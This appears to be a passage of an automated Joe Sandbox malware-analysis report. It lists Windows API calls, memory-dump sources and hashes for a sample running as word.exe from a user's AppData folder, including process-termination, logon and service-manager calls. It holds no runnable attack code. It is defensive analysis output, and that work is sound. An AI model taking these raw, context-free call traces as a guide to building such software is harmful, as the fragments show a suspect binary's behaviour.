                                                                            • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                            • String ID:
                                                                            • API String ID: 752480666-0
                                                                            • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                            • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                            • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                            • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                            • String ID:
                                                                            • API String ID: 3275902921-0
                                                                            • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                            • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                            • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                            • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                            • CloseHandle.KERNEL32(?), ref: 00439383
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                            • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                            • __calloc_crt.LIBCMT ref: 0041419B
                                                                            • __getptd.LIBCMT ref: 004141A8
                                                                            • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                            • __dosmaperr.LIBCMT ref: 00414201
                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                            APIs
                                                                            • SendMessageW.USER32 ref: 004554DF
                                                                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                            • DestroyWindow.USER32 ref: 00455678
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                            APIs
                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                            • LineTo.GDI32(?,?,?), ref: 00447227
                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                            • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                            • EndPath.GDI32(?), ref: 0044724E
                                                                            • StrokePath.GDI32(?), ref: 0044725C
                                                                            APIs
                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0044CBEF
                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                            • MulDiv.KERNEL32 ref: 0044CC29
                                                                            • MulDiv.KERNEL32 ref: 0044CC37
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$Release
                                                                            • String ID:
                                                                            • API String ID: 1035833867-0
                                                                            • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                            • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                            • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                            • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                            • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                              • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000), ref: 004356D9
                                                                            • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                            • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                            • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                            • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                            • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                            APIs
                                                                            • PostMessageW.USER32 ref: 00437127
                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 839392675-0
                                                                            • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                            • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                            • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                            • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                            APIs
                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\AppData\Roaming\word.exe,00000004), ref: 00436055
                                                                            • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                            • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                            • GetLastError.KERNEL32 ref: 00436081
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                            • String ID:
                                                                            • API String ID: 1690418490-0
                                                                            • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                            • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                            • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                            • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                            APIs
                                                                              • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                            • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                            • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                            • CoUninitialize.OLE32 ref: 00475D71
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                            • String ID: .lnk$HH
                                                                            • API String ID: 886957087-3121654589
                                                                            • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                            • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                            • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                            • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1173514356-4108050209
                                                                            • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                            • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                            • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                            • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                            APIs
                                                                            • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                            • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                            • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                            • MessageBeep.USER32(00000000,?,?,?,?,?,?,?), ref: 00441DF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID: X+
                                                                            • API String ID: 1352109105-1938338529
                                                                            • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                            • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                            • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                            • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 763830540-1403004172
                                                                            • Opcode ID: 5d0a2c71db6aade5b96b23b3bd4061acea82ce6bbdfd8ce7b1b84c9309f98e76
                                                                            • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                            • Opcode Fuzzy Hash: 5d0a2c71db6aade5b96b23b3bd4061acea82ce6bbdfd8ce7b1b84c9309f98e76
                                                                            • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 004505BF
                                                                            • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                            • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                            • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Proc$Parent
                                                                            • String ID: X+
                                                                            • API String ID: 2351499541-1938338529
                                                                            • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                            • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                            • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                            • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyWindow
                                                                            • String ID: X+$msctls_updown32
                                                                            • API String ID: 3375834691-654392625
                                                                            • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                            • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                            • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                            • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,756F13E0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                              • Part of subcall function 0043569D: DuplicateHandle.KERNEL32 ref: 004356C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentHandleProcess$Duplicate
                                                                            • String ID: nul
                                                                            • API String ID: 2124370227-2873401336
                                                                            • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                            • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                            • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                            • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,756F13E0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                              • Part of subcall function 0043569D: DuplicateHandle.KERNEL32 ref: 004356C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentHandleProcess$Duplicate
                                                                            • String ID: nul
                                                                            • API String ID: 2124370227-2873401336
                                                                            • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                            • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                            • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                            • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                            • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                            • DestroyWindow.USER32 ref: 0044135B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 3529120543-1011021900
                                                                            • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
